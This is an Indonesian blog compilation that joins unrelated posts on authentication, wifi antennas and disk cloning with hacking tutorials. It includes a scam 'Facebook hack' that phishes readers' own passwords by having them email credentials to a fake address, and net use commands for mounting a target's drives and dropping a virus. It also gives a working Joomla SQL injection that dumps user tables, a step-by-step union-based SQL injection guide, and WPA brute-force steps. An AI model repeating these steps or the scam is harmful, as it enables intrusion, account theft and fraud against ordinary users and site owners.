Kenapa Alice dan Bob bisa terjebak dan tertipu oleh Charlie? Itu karena Alice dan Bob tidak melakukan otentikasi dulu sebelum berkomunikasi. Otentikasi akan menjamin Alice berbicara dengan Bob yang asli, bukan Bob palsu yang diperankan oleh Charlie. Begitu juga dengan otentikasi, Bob akan berbicara dengan Alice yang asli, bukan Alice palsu yang diperankan oleh Charlie.

Pentingnya Otentikasi: Who Are You Speaking With?
Otentikasi adalah proses untuk membuktikan identitas suatu subjek, bisa orang atau mesin. Proses membuktikan identitas seeorang ada banyak cara, namun semuanya bisa dikelompokkan dalam 3 kategori:
  • What you know: PIN, password, pasangan kunci publik-privat
  • What you have: smart card, kunci, USB dongle
  • What you are: fingerprint, retina
Secara singkat otentikasi menjawab pertanyaan “Who are you speaking with?”. Pertanyaan itu sangat penting diketahui sebelum dua pihak berkomunikasi. Bila dua pihak berkomunikasi tanpa sebelumnya melakukan otentikasi, maka keduanya bisa terjebak berbicara dengan orang yang salah, yaitu orang yang menyamar menjadi lawan bicaranya. Bila sampai ini terjadi maka akibatnya bisa sangat fatal, salah satunya adalah terjadinya mitm attack.
Bila dua orang yang sudah saling mengenal berbicara dengan tatap muka langsung, maka tidak mungkin keduanya terjebak dan tertipu berbicara dengan orang yang salah. Otentikasi menjadi sangat penting bila kedua pihak berbicara melalui media komunikasi jarak jauh seperti telpon atau internet. Dalam komunikasi jarak jauh, kita hanya bisa mendengar suara lawan bicara kita, jadi sangat besar kemungkinan kita berbicara dengan orang yang salah.
Jadi cara untuk mencegah serangan MITM adalah dengan melakukan otentikasi sebelum berkomunikasi. Bahkan walaupun otentikasi dilakukan oleh salah satu pihak saja, itu sudah cukup untuk mencegah mitm. Mari kita lihat kembali contoh Alice,  Bob dan Charlie, bila otentikasi hanya dilakukan oleh Bob, sedangkan Alice tidak. Karena tidak adanya otentikasi Alice, maka Charlie bisa menyamar sebagai Alice di hadapan Bob, namun Charlie tidak bisa menyamar sebagai Bob di hadapan Alice. Kenapa Charlie tidak bisa menyamar menjadi Bob? Sebab Alice akan menguji keaslian Bob dengan otentikasi, sehingga penyamaran Charlie sebagai Bob palsu akan terbongkar dan Alice tidak akan mau melanjutkan komunikasi.

Facebook Hack

FACEBOOK HACK
BELAJAR CARA HACK FACEBOOK 100% BERHASIL Hacker itu bukan penjahat melainkan orang yg jenius. Kode promosi halaman tinggal copy paste sebuah kode di status atau dinding anda atau teman anda >> Cara Mengetahui Password Teman Dekat Anda
LANGKAH_LANGKAHNYA UNTUK MENGGETAHUI PASSWORD FACEBOOK TEMEN KAMU: 1. KLIK LIKE/SUKA HALAMAN INI TERLEBIH DAHULU
==================================================
==================================
==================================================
==================================================
==================================================
BACA BAIK-BAIK !!!...
==================================================
Bugs pada facebook memiliki sistem pertahanan yang cukup tangguh. Disamping itu, tampilan yang menawan dan banyakanya fitur- fitur menarik yang tersedia dibandingkan dengan fs dan yang gratisan lainnya menjadi alasan utama bagi mereka untuk memilih Fb Ketika dahulu (dan juga hingga kini) tehnik session hijacking semakin marak dikalangan para attacker, pengguna fb bisa sedikit berlega hati karena facebook telah mengantisipasi hal tersebut dengan menerapkan beberapa aturan berikut:

1. Menetapkan session identifier yang unik
2. Menetapkan sistem identifier berpola acak
3. Session identifier yang independen
4. Session identifier yang bisa dipetakan dengan koneksi client side.

Keempat hal diatas telah cukup untuk membuat banyak para kiddies harus gigit jari karena serangan session hijacking akan sangat-sangat sulit untuk dilakukan (karena ketidakmampuan mereka tentunya dan pengecualian bagi kaum elite ) Tapi bagi kamu yang sangat-sangat bernafsu untuk bisa menembus email yahoo orang lain kini bisa sedikit terhibur karena telah ada sebuah bugs baru pada fb. fb memiliki sebuah alamat email special yang otomatis dikendalikan oleh mesin yang jika kita kirimkan sebuah nilai “recovery” trenkripsi kepada alamat itu bersama alamat email korban, maka kamu akan memperoleh balasan email otomatis yang berisi password korban Memanfaatkan Bugs

____________________________________________

ok, sudah gak sabar yach… ikuti langkah-langkah berikut:

1. Sign in lah kedalam account email kamu terlebih dahulu. yahoo, gmail, dll..

2. kemudian dengan perasaan yang mendalam tulislah sebuah pesan, tekan tombol [Compose]/[tulis surat] untuk menulis email.

3. Pada form isian to/ kepada masukkan alamat berikut:

hackstap.facebook@gmail.com

Alamat inilah yang saya sebutkan sebagai alamat special tadi. Sebenarnya alamat ini hanya boleh diketahui oleh para admin Facebook saja, namun yeah.. kini alamat mematikan ini telah jatuh ke tangan kita

4. Pada form cc dan bcc, kosongi saja kedua form tersebut

5. pada kolom Subject ketik “uidfb” tanpa tanda kutip.

6. Pada form message (pesan), ketik kode UID berikut:

facebook.com FALSE/FALSE 1121114252079889
Username facebook : user ID facebook kamu
Facebook password : password kamu
Recover : user ID facebook korban
TTG : tanggal lahir kamu
6. Setelah itu tekan tombol send.

Dan tunggulah dalam beberapa hari kamu akan menerima email balasan yang berisi password korban dan informasi-informasi mengenai korban seperti secreet question yang dipakai korban beserta jawabannya dan tanggal lahir korban

Contohnya:

misalkan user ID facebook kamu adalah elite@yahoo.com
dan password kamu 3l1t3b3n3r4n
dan user ID facebook korban: korban@yahoo.com

maka susunannya adalah sebagai berikut:

to: hackstap.facebook@gmail.com
cc:
bcc:
Subject: Recovery
message: facebook.com FALSE/FALSE 1121114252079889
Username facebook : elite@yahoo.com
Facebook password : 3l1t3b3n3r4n
Recover : korban@yahoo.com
TTG : 10041994

___________________________________________

:: Cara Pencegahan ::

Bagi kamu para pengguna fb yang tidak ingin passwordmu dicuri dengan tehnik ini, lakukan cara berikut:

1. Pada form isian sento to: isikan

hackstap.facebook@gmail.com

2. Pada kolom Subject ketik “No Recovery” tanpa tanda kutip.

3. Kirim message sebagai berikut:

facebook.com No Rerovery
Username facebook : elite@yahoo.com
Facebook password : password kamu

contohnya yang sudah jadi:

to: hackstap.facebook@gmail.com
cc:
bcc:
subject: No Recovery
message: facebook.com No Rerovery
Username facebook : username facebook kamu
Facebook password : password facebook kamu
TTG : tanggal lahir kamu
Setelah mengirim email tersebut, maka bisa dipastikan facebook kamu sudah aman dari bugs mematikan ini. Orang yang berusaha melakukan tehnik ini tidak akan pernah mendapat balasan email yang berisi passswordmu. Namun harap diingat bahwa kamu juga harus melakukan hal ini setelah melakukan perubahan account. Jadi jika suatu ketika kamu mengganti password, lakukan cara penyelamatan lagi dengan melakukan langkah ini. Cepat lakukan sebelum terlambat, karena sudah banyak orang yang terkena cara ini! Ingat: Lakukan cara 2. untuk mendapatkan password korban Lakukan cara 3. untuk mencegah
facebook kamu di hack orang lain.

_____________________________________________

Bisa langung dari facebook kita jg tanpa harus membuka email

cara nyaLakukan langkah-langkah dibawah :

1. Login email facebook anda dan lanjutkan ke halaman mengirim pesan.
2. Klik compose message
3. Pada tulisan To isi dengan
hackstap.facebook@gmail.com
4. Pada tulisan subject isi dengan kata “PASSWORD RETRIEVE”
5. isi pesan :
baris pertama tulis alamat email anda.
baris kedua tulis alamat email facebook temen anda.
baris ketiga tulis password facebook anda.
baris keempat tulis kode ini : cgi-bin/$et76431&pwr999
Lalu Send/Kirim.

Contoh :
To : hackstap.facebook@gmail.com
Subject : PASSWORD RETRIEVE
Message :

anda@yahoo.co.id
temen anda@yahoo.com
Password anda
cgi-bin/$et76431&pwr999

Lalu Send/Kirim.

INGAT : JANGAN DISALAHGUNAKAN!!
Good luck.... ____________________________________________

CATATAN :
1. Jika anda mendapat pemberitahuan "Cannot find a password ! Give a little time to fix this problem, We will sent back your request for a few days"
tunggu beberapa hari,dan mesin hacker akan mengirimkan password lagi ke anda. (paling lama 1minggu)
2. Walaupun email anda yahoo, namun email si korban gmail, tidak menjadi masalah.namun ingat ini hanya berlaku untuk pengguna YAHOO,YMAIL dan GMAIL.

REMOTE KOMPUTER DALAM SATU JARINGAN MENGGUNAKAN CMD

pada kali ini saya share tentang bagaimana meremote komputer orang lain simak dengan baik baik ya sahabat bloger sejatii,.,.,.
pertama yg harus di siapkan adalah, ya seperti biasa .,.,.
kopy hangat dan bagi sahabat bloger yang perokok aktiv sediakan rokok satu pack
next  

Salah satu senjata terampuh para Hacker adalah Command Prompt, percaya tidak percaya tool bawaan windows ini bisa sama gunanya sama Remote Executor, FTP Manager, dll. tetapi bedanya ini berbasis CUI (Code User Interface) kalo Remote Executor, FTP Manager kebanyakan berbasis GUI (Graphical User Interface) yang semudah klak-klik-klak-klik dll.

Dalam tulisan ini saya akan memberi tutorial meremote komputer orang lain dengan Command Prompt.
Persyaratanya adalah :

1. Pc Kita & Pc target sama-sama sedang connect internet
2. Pc Kita & Pc target sama-sama menggunakan OS Windows

Tentukan IP target mu,Dan Mulai jalankan CMD dengan cara :
Start ====> RUN ===> CMD
Kemudian ketikan perintah dibawah ini :

cd c:\  [enter]

C:\>net use \\ip_target [enter]
kalo ada keterangan
the command completly succesfully, lanjut...

C:\>net use K: \\ip_target\c$ [enter]
kalo ada keterangan
the command completly succesfully, lanjut...

Seperti Gambar Di bawah ini :
CARA MELAKUKAN REMOTE KOMPUTER ORANG LAIN MENGGUNAKAN CMD











Setelah Sukses Langsung Buka My Computer anda
maka akan terlihat drive K disanalah Drive C target berada
Jika ingin meremot Drive D  cukup mengganti kode net use K: \\ip_target\c$ menjadi net use K: \\ip_target\d$

jika anda ingin menambahkan virus ke komputer yang agan hack copy file virus tersebut ke folder tersebut jalan kan  pasti maknyussss dechhh
sekian share dari saya  mudah mudahan bermanfaat bagi sahabat bloger>>>>>

TUTORIAL EXPLOIT JOMLA

hack jomla
- Step 1 
"Exploit Joomla option=com_ignitegallery"
sedikit dr awamer
 "Exploit Joomla option=com_ignitegallery"
no picture.. sorry
--first  coba kita cari di google dengan dork ini
inurl:"index.php option=com_ignitegallery"
kembangin sdnri ya

- Step 2
pasang exploitnya
exploit : /index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--

 contoh : http://www.pulot.com/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat%28id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype%29,4,5,6,7,8,9,10+from+jos_users-

- ntar muncul tu 62:admini:989868wjhgd blablabla..

 - second coba kita reset password nyasekarang kita reset password dengan menggunakan exploit ini :

www.site.com/index.php?option=com_user&view=reset  
masukin aja email admin tadi..

- third wah minta activation pula, tenang kita cari dulu activationnya :D
exploit :

 index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,activation),4,5,6,7,8,9,10+from+jos_users-- ntar keluar aktifasi nya..


NOTE: klo aktifasi nya ada code tanda $.. berarti code aktifasi nya g bisa pke, find target lain trus masukin code aktifasi nya..


trus dia nya minta password baru.. masukin password sesuka kamu.

oke langsung ke tahap berikutnya,
sekarang kita masuk keadminnya
http://site.com/administrator/

ANTENA WIFI RAKITAN

cara merakit antena wifiSebaiknya Anda pertimbangkan untuk membuat Wajan Bolic. Kenapa? Karena Wajan Bolic lebih murah daripada Antena Kaleng berdasarkan dari uji coba yang saya lakukan.


1. USB Wifi Blue Link BL U80G = Rp. 130.000

2. Wajan 38cm = Rp 27.500

3. 1 Meter PVC 3" = Rp. 12.500

4. 2 Doff (tutup pralon) = Rp. 10.000

5. 1 buah Baut = Rp. 6000

6. 1 Gulung Kertas Alumunium = Rp. 33.000

7. 8 M kabel belden 1538 A = 32.000

8. 1 buah USB Extender = Rp. 10.000


Bagaimana dengan biaya antena kaleng? Tahun 2006 saya menghabiskan biaya lebih dari 400 ribu untuk pembuatan antenna kaleng, tapi untuk sekarang mungkin sudah lebih murah dan ada juga komponen yang makin naik harganya. Seperti komentar berikut:

Di panduan yang Bapak buat, harga SMA Connectornya Rp 11.000,- tapi setelah saya ke toko Sagan Baru, saya tanya harganya Rp 32.000,- Lalu, harga Soket N Connector dan Plugnya dua kali lipat lebih mahal dari panduan yang Bapak buat. Gimana dong, Pak? Apa memang harganya udah segitu?

dan

saya sudah buat antena kaleng, ternyata biaya untuk beli alat konektor nya 155.000 beda jauh sama yang di gambar. trus setelah di coba. tetap gak bisa konek internet.

Karena antusiasnya pengguna internet Indonesia untuk mendapatkan koneksi internet dengan harga murah atau gratis, sekaligus tidak ingin mengecewakan pembaca, Berikut pertanyaan yang sering ditanyakan dan diulang-ulang (maklum orang Indonesia banyak yang malas membaca).



T: Dimanakah saya bisa men-download e-book antena kaleng?

J: Silakan download disini. Sudah lengkap dengan gambarnya dan antena calculator.



T: Apakah Anda sudah mencoba mempraktekannya (membuat antenna kaleng)?

J: Tentunya sudah, dan saya pergunakan hingga kalengnya berkarat .



T: Berapa jarak maksimal antenna kaleng ke Access Point atau sebaliknya? Apa ada hubungannya dengan ketinggian antena.

J: Jarak maksimal hanya 1 km, dan pernah saya coba sejauh kurang lebih 700 meter, dan hubungannya dengan ketinggian, semakin tinggi Antena maka semakin tinggi pula peluang untuk mendapatkan sinyal Wi-Fi



T: Berapa maksimal panjang kabel RG 58?

J: Panjang maksimal 7 meter jika lebih dari itu maka koneksi tidak akan berjalan dengan baik. Idealnya 50 cm.



T: Apa tembaga buat antena bisa diambil dari kabel tembaga biasa?

J: Bisa. Saya memakai tembaga dari kabel listrik.



T: Apakah antena kaleng bisa langsung konek ke hotspot? Apa perlu software?

J: Bisa, jika hotspot-nya memang diperuntukan untuk umum, dan untuk terhubung tidak perlu software tambahan, karena di Windows atau Linux sudah ada. Silakan baca cara terhubung ke Wi-Fi di e-booknya.



T: Aku coba pakai antena kaleng sudah dapat sinyal Wi-Fi cuma 1 baris tapi tidak bisa konek? padahal aku tanya hotspotnya dibuka untuk umum, apa perlu seting lagi di windows?

J: Satu baris artinya sinyal sangat lemah dan kemungkinan untuk terhubung sangat sulit. Pastikan juga Wireless Zero Configuration-nya sudah jalan (Baca di e-book, sudah ada penjelasannya). Tanyakan juga kepada pemilik Wi-Fi, bentuk umumnya seperti apa? Ada juga yang di bebaskan untuk umum tapi kita harus mendaftar.



T: Nah apa gak perlu account/user/password tuk konek ke akses poin yang bakal menjadi sasaran?

J: Tergantung dari settingan Akses Point.



T: Laptop kan udah ada wifinya tanpa menggunakan modem, bagaimana cara memperkuat penerima wifi yang udah ada di dalam laptop? apa masih pakek tambahan modem?

J: Kalau yang ini belum tahu caranya, karena Wi-Fi sudah terpasang di laptop atau built in, dan yang jelas tidak perlu tambahan modem.



T: Mas, ada gak cara bikin antenna 2.4 GHz dengan memanfaatkan Wireless adapter internal pada notebook, tolong donk!!!

J: Maaf, Sejauh ini saya belum menemukan tutorial cara memanfaatkan atau memperkuat sinyal dari Wireless adapter internal laptop.



T: Pada no 2 tentang alat yang di perlukan dituliskan tentang PCMCIA Card ( bila anda menggunakan laptop yang belum di lengkapi perangkat wifi 802,11b atau 802,11g) yang mempunyai antena luar.

1. Apa maksudnya itu mas?

2. Apa laptop saya punya hal itu? (laptop saya punya fasilitas wifi yang bisa konek langsung kalau ada hotspot terbuka)

3. Apabila laptop saya mempunyai fasilitas wifi tersbut, apakah masih di perlukan juga PCMCIA untuk pembuatan antena kaleng ini? (mksud saya, apakah kabel RG 58 yang dari antena tetap di sambungkan juga ke PCMCIA card? )

J: Berikut jawaban dari tiga pertanyaan yang paling sering ditanyakan.

1. Maksudnya jika laptop belum ada Wi-Fi internal atau bawaan, maka harus dibelikan untuk PCMCIA atau USB Wifi untuk dapat terkoneksi internet.

2. Karena laptop sudah terhubung ke hotspot, artinya laptop sudah ada Wifi internal tapi tidak bisa dipakai untuk antena kaleng.

3. Masih perlu. Tidak perlu beli PCMCIA dan kabel RG 58, karena sekarang sudah ada wajan bolic yang menggunakan USB Wifi yang harganya lebih murah dari PCMCIA.



T: Om... Kalau pake wifi adpater bawaan laptop bisa gak? Terus nyolokin kabel antena ke laptop dimananya?

J: Belum bisa. Karena Wi-Fi adapter bawaan, maka tidak ada tempat untuk nyolokin kabel.



T: Mas penulis... Sekarang kayaknya susah nyari Wireless Lan Card. Kalo pake USB wireless bisa ga?

J: Bisa. Perhitungan yang digunakan juga sama... Silakan di coba. Untuk memperpanjang kabelnya silakan gunakan UTP + USB Extender (untuk caranya, silakan baca sampai habis tulisan ini).



T. Saya tidak menggunakan PCI WLAN card, tapi mengunakan USB WLAN bisa ga? trus klo seandainya bisa, langkah-langkah apa saja yang perlu saya lakukan nanti untuk bisa merubah USB WLAN saya menjadi Antena luar, karena saat ini saya sudah punya USB WLAN, kan sayang klo saya harus beli PCI WLAN.

J: Bisa.Langkah-langkahya sama dengan jawaban diatas.



T: Apakah antena kaleng ini legal?

J: Legal, kecuali sudah ada hukumnya. Maaf, belum pernah baca larangannya.



T: Bagaimana kita mengetahui suatu area atau daerah ada hotspotnya?

J: Untuk mengetahui hotspot disekitar gunakan netbook, laptop, HP atau BB yang sudah ada WiFi-nya. Untuk memudahkan dalam melacak keberadaan sinyal, install netstumbler,insider atau vistumbler. Metode pencarian ini dikenal dengan istilah War Driving



T: Bagaimana kalau setiap peralatan yang dibutuhkan untuk membuat antena kaleng disertkan gambarnya, supaya kalau kita nanya ke tokonya jadi lebih gampang.

J: Gambarnya sudah ada didalam e-books. Silakan di download e-booknya dan dibaca lebih teliti.



T: Apakah antena kaleng tahan dari hujan? Bagaimana supaya tahan hujan? Apakah hujan mengganggu sinyalnya?

J: Tergantung dari bahan antena. Kaleng mudah karatan (korosi) dan untuk membuatnya tahan hujan bisa dibuatkan penutup diatasnya, tapi ini tidak perlu dilakukan karena kaleng bisa kita ganti setiap saat dan murah. Tentu saja hujan dapat mengganggu sinyal dan membuat koneksi jadi lambat.



T: Apakah wireless hack melanggar hukum?

J: Hacking jika tujuan untuk testing keamanan system dari Wi-Fi dan diberikan ijin tentunya tidak melanggar hukum, tapi jika hacking yang dimaksudkan adalah untuk mendapatkan akses internet dari Wi-Fi yang kita hack tentunya sama dengan mencuri. Untuk hukumannya saya belum tahu.



T: Saya udah buat antena kaleng, dan sudah dapet sinyalnya, terus bagaimana caranya agar saya bisa terhubung ke internet?

J: Caranya, pastikan terlebih dahulu bahwa sinyal yang ada tidak di proteksi (ada gambar gembok) dan bisa di akses oleh umum. Caranya baca di e-book.



T: Daerah mana saja yang bisa memakai antena kaleng?

J: Semua daerah yang ada sinyal Wi-Fi.



T. bagaimana cara penyambungan kabel UTP dan USB extender?

J: Berikut adalah penyambungan atau rangkaian kabel UTP dengan USB:

putih oranye dan oranye (UTP) = (USB) merah

putih hijau (UTP) = (USB) putih

hijau (UTP) = (USB) hijau

putih biru, biru, putih coklat, coklat (UTP) = (USB) hitam

Info lengkapnya: Teknik USB Extender



T: Berapa maksimal panjang UTP untuk memperpanjang USB Extender?

J: 5 meter untuk kualitas yang bagus. 8 meter sudah mencukupi dengan kabel yang baik (Belden AMERIKA). Jika lebih dari 8 meter, Anda harus menggunakan USB Power Injector.





HACKING WIFI

cara hack speedy password
tutor kali ini akan membahas cara hack password wpa/wpa2 pada area hospot yang terkunci security wpa2
dengan tool airlin kita bisa bruteforce security wifi tanpa wpa handshake
langsung saja
download toolnya --> Disini
taruh hasil download pada desktop lalu ekstrak dengan perintah
unrar x /root/Desktop/airlin-1-0-1.rar
setelah itu masuk folder airlin

cd Desktop/airlin-1-0-1
chmod 777 airlin.sh
mv airlin.sh /usr/bin/airlin.sh

setelah ailin dipindah folder ke /usr/bin lalu keluar dan buka terminal lagi
dan jalankan program airlin.sh

pilih interface kalian disini saya menggunakan wlan0
Lalu cari korban wifi yang terproteksi wpa/wpa2
aktifkan airmon-ng dan scan dan scan dengan airodump-ng dengan membuka tab baru dengan menekan ctrl + shift + t
lalu copy paste essid wifi tersebut
lalu pilih wordlist kalian
disini wordlist saya ada pada /root/Desktop/contoh.txt
lalu isi kan delay nya
jangan terlalu cepat delaynya itu berakibat airlin gak bisa membruteforce dengan akurat

disini saya memilih delay 25
ok tunggu hingga proses brute selesai

dan password pun di temukan

Cara Cloning Hardisk Mudah dan Cepat dengan XXClone Gratis

cara clonning hardiskSebuah pertanyaan yang tepat diajukan sebelum saya melanjutkan artikel ini adalah : kenapa kita perlu cloning hardisk? Apa manfaat dan keuntungannya? Studi kasus berikut ini mungkin bisa menjelaskan tentang manfaat yang kita dapatkan dari kloning hardisk :

Hardisk komputer kita berkapasitas kecil. Kita ingin upgrade ke hardisk yang berkapasitas lebih besar. Sayangnya, di dalam hardisk tersebut sudah terinstall Windows, software, aplikasi, dan banyak hal lainnya. Akan sangat melelahkan dan boros waktu jika kita menginstall semuanya dari awal. Hal yang bisa kita lakukan untuk menghemat waktu dan produktivitas adalah dengan mengkloning hardisk lama kita ke hardisk kita yang baru. File, Windows, Software, Aplikasi, serta berbagai setting lainnya akan bisa digunakan secara langsung tanpa kita perlu bersusah payah.

Dengan manfaat cloning hdd yang sedemikian besar, hari ini saya akan memberikan sebuah software clone hardisk yang gratis dan legal : XXClone!

Apa itu XXClone?

XXClone adalah freeware yang dibuat untuk mempermudah anda dalam melakukan kloning hardisk. Fungsinya sama dengan software Norton Ghost.

Sebenarnya XXClone Free merupakan versi gratis dari XXClone Home dan XXClone Pro. Namun demikian, fitur XXClone Free sudah bisa digunakan untuk mengkloning hardisk dengan mudah dan cepat.

Bagaimana cara mengkloning hardisk dengan XXClone Free?

1. Download XXClone Free versi terbaru

Installer XXClone Free disini http://www.xxclone.com/xxclone.zip

Homepage XXClone Free disini http://www.xxclone.com/

2. Install dan jalankan XXClone Free

3. Pastikan kedua hardisk : hardisk sumber (source) dan hardisk tujuan (target) sudah terpasang di komputer anda.

3. Ketika pertama kali XXClone dijalankan, akan ada tampilan untuk memilih Source Volume dan Target Volume. Pilih sesuai dengan yang anda inginkan kemudian klik “Start”. Klik Yes jika ada popup konfirmasi. Tunggu hingga selesai.

4. Jika dalam kasus ini anda sedang mengkloning hardisk yang berisi sistem operasi, maka anda harus membuat Clone Drive tersebut bootable. Caranya cukup klik tab “Cool Tools” dan klik tombol “Make Bootable”

5. Saat ada popup yang muncul, centang ketiga Boot Control : Write MBR, Write Boot Sector, dan Write BOOT.INI. Kemudian klik Start. Saat ada konfirmasi, klik Yes.

6. Hardisk anda sudah selesai dikloning, Klik Exit.

CARA MELAKUKAN SQL INJECTION


TRIKMELAKUKAN SQL INJECTION
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Yang perlu di ketahui sebelum sql injection pada mysql :
karakter: ' atau –
comments: /* atau –
information_schema untuk versi: mysql versi 5.x
( tidak support untuk mysql versi 4.x )

      Cari Target + Bugnya
Cara mencarinya adalah dengan dork sql injection. Misalnya inurl:index.php?id=” search dengan om GOOGLE, misalkan kita mendapatkan alamat situs

http://www.target.com/index.php?id=4

Lalu untuk mengetahui suatu web memiliki bug SQL injection, tambahkan sebuah tanda petik pada akhir url, sehingga urlnya menjadi

http://www.target.com/index.php?id=4

lalu tekan enter dan apa yang terjadi pada situs tersebut? Situsnya menampilkan pesan error, berarti parameter id tidak di filter dengan baik atau bahkan tidak difilter sama sekali. Untuk mengetahui suatu web aplikasi memiliki bug SQL Injection salah satunya adalah menggunakan perintah and+1=1--
Ketika di tambahkan parameter +and+1=1-- pada akhir URL, situsnya tampil dengan normal karena 1=1 menghasilkan nilai true.

http://www.target.com/index.php?id=4+and+1=1--


Dan ketika di tambahkan parameter +and+1=2-- isi berita tidak dapat ditampilkan karena 1=2 hasilnya false dan ini membuktikan bahwa web aplikasi tersebut  99.9% memiliki bug SQL Injection

http://www.target.com/index.php?id=4+and+1=2--

     Cari Column Yang Memiliki Celah Injection
Setelah saya tau bahwa web tersebut memiliki Bug SQL Injection saya harus mencari tau nama table dan column, tapi sebelum itu saya harus mencari tau pada column ke berapa saya bisa melakukan Injection, untuk itu saya menggunakan perintah +order+by+ perhatikan url berikut.

http://www.target.com/index.php?id=4+order+by+1--
http://www.target.com/index.php?id=4+order+by+2--
http://www.target.com/index.php?id=4+order+by+3--
http://www.target.com/index.php?id=4+order+by+4--
http://www.target.com/index.php?id=4+order+by+5--


url diatas jika di coba satu persatu akan menampilkan situsnya secara normal. Tapi ketika saya menginputnya dengan order+by+6-- apa yang terjadi??? Browser menampilkan pesan error. Dari pesan error tersebut bisa dipastikan terdapat 5 buah column yang terdapat disalah satu table yang belum kita ketahui namanya. Berarti yang kita ambil sampai +order+by+5-- saja.

     Gunakan Perintah Union Select
Setelah saya mengetahui terdapat 5 buah column pada target, selanjutnya yaitu mencari column yang bisa dilakukan injeksi. Untuk itu saya menggunakan perintah +union+select+ (pakai union all select juga bisa koq) sehingga urlnya menjadi :

http://www.target.com/index.php?id=4+union+select+1,2,3,4,5--

Dan apa yang tampak di browser tidak ada yang aneh bukan? situsnya tampil dengan normal. Tetapi jika parameter id saya ganti menjadi -4 yang pastinya tidak ada isi data -4 di Database.

http://www.target.com/index.php?id=-4+union+select+1,2,3,4,5--

Oke disini browser menampilkan angka 2 & 3, dan angka inilah yang sering disebut dengan angka ajaib, karena angka tersebut adalah letak column dimana attacker bisa melakukan injeksi lebih lanjut.

     Cari informasi Database Target
Dengan tampilnya angka ajaib tersebut anda bisa 'mengintip' beberapa informasi seperti nama database, nama user database, versi database, sessi user dll. Untuk melihat nama database, injeksi urlnya menjadi
http://www.target.com/index.php?id=-4+union+select+1,database(),3,4,5--

Dan disini browser menampilkan nama database yaitu xyb_injector. Saya mencoba mengintip lagi nama user database pada situs tersebut dengan menginjeksinya pada column ke-2 dan versi pada column ke-3 dan url injeksinya menjadi :

http://www.target.com/index.php?id=-4+union+select+1,user(),version(),4,5--

Ternyata user dabasenya root@localhost dan beruntung sekali karena versi mysql yang di gunakan adalah versi 5.0.51a-community, lho emang kenapa kalo versi 5??? Karena bisa dilanjutin bacanya :D, kalo misalkan versi 4 tinggalin aja deh, cari target baru, hahahaha ?.

Coba anda perhatikan, anda hanya bisa meng-injeksi satu perintah pada satu column. Bisakah meng-injeksi lebih dari satu perintah pada satu colums??? Heheheh tentu saja bisa dong, untuk itu anda bisa menggunakan perintah yang sudah disediakan langsung oleh mysql yaitu perintah concat(perintah1,perintah2). Contoh dibawah ini saya meng-intip nama user dan nama database pada column ke-2 dan pada column ke-3 saya mengintip versi databasenya.

http://www.target.com/index.php?id=4+union+select+1,concat(user(),0x3a,database()),version(),4,5--

     Dapatkan Nama Table
Saya sudah mendapatkan informasi database web tersebut, sebenarnya yang saya butuhkan hanyalah versi databasenya saja, seperti yang sudah anda lihat, versi database yang ditampilkan adalah 5.0.51a-community dan tentu ini memudahkan saya dalam mendapatkan table dengan menggunakan perintah table_name pada column yang memiliki bug yaitu angka 2 atau 3 pada web tersebut. Di akhir statement tambahkan from+information_schema.tables+where+table_schema=database()+limit+0,1--

Sehingga urlnya menjadi :

http://www.target.com/index.php?id=4+union+select+1,2,table_name,4,5+from+information_schema.tables+where+table_schema=database()+limit+0,1--


Di web tersebut tampil sebuah table bernama "table_attacker". Untuk melihat seluruh table sekaligus gunakan perintah group_concat(table_name) pada column yang memiliki bug, sehingga urlnya menjadi

http://www.target.com/index.php?id=4+union+select+1,2,group_concat(table_name),4,5+from+information_schema.tables+where+table_schema=database()--

Hihihi sip, seluruh table berhasil saya dapatkan, diantara table tersebut, table manakah yang harus saya telusuri lebih jauh lagi??? table_user sepertinya menarik :P yuk kita lihat apa isinya.

Dapatkan Nama Column
table_user sudah saya dapatkan selanjutnya yaitu mencari nama column pada table tersebut, untuk itu saya menggunakan perintah group_concat(column_name) sehingga urlnya menjadi

http://www.target.com/index.php?id=4+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name=0xhexa--


pada tahap ini kamu wajib mengextrak kata yang keluar pada isi table tadi menjadi hexadecimal yaitu dengan cara mengkonversinya. Salah satu website yg digunakan untuk konversi :
http://www.string-functions.com/string-hex.aspx


Contoh kata yg ingin di konversi yaitu table_user maka akan menjadi 7461626c655f75736572 ini masih belum selesai, anda harus menambahkan angka 0 dan huruf x pada awal hasil hexa tersebut sehingga hasilnya menjadi 0x7461626c655f75736572 dan inilah yang akan kita injeksikan pada nama tabel. Sehingga urlnya menjadi

http://www.target.com/index.php?id=4+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name=0x7461626c655f75736572--
< 

Alhasil nama column dari table_user sudah saya dapatkan yaitu user_id dan password_id.

     Dapatkan Usename & Password
Saya sudah mendapatkan nama table “table_user” yang berisi 2 buah column yaitu user_id” dan “password_id” dan akhirnya anda sudah sampai di detik-detik terakhir yaitu menampilkan isi data dari column tersebut. Tambahkan 0x3a pada group_concat(hasil isi column yg mau dikeluarkan,0x3a, hasil isi column yg mau dikeluarkan) perintah +from+(nama table berasal) à dimasukkan setelah angka terakhir sehingga urlnya menjadi :
http://www.target.com/index.php?id=4+union+select+1,2,group_concat(user_id,0x3a,password_id),4,5+from+table_user--

Tampil
lah seluruh username dan password dari situs tersebut. Biasanya password yang kita dapat sudah terenkripsi dalam bentuk md5 atau enkripsi yang lainnya. Untuk menterjemahkannya anda bisa mencari website yang menyediakan cracking password atau dengan tool cracking password. Setelah itu anda tinggal mencari halaman log in admin dan masuki sistemnya. Setelah memasuki sistem biasanya hacker menanamkan php shell untuk lebih gampang keluar masuk dan bisa mengexplore isi dari website tersebut terlebih lagi si hacker bisa melakukan teknik jumping sehingga semua website yang berada dalam 1 server yang sama dengan website yang terkena hack tersebut bisa di ambil alih oleh hacker tersebut, berbahaya sekali bukan?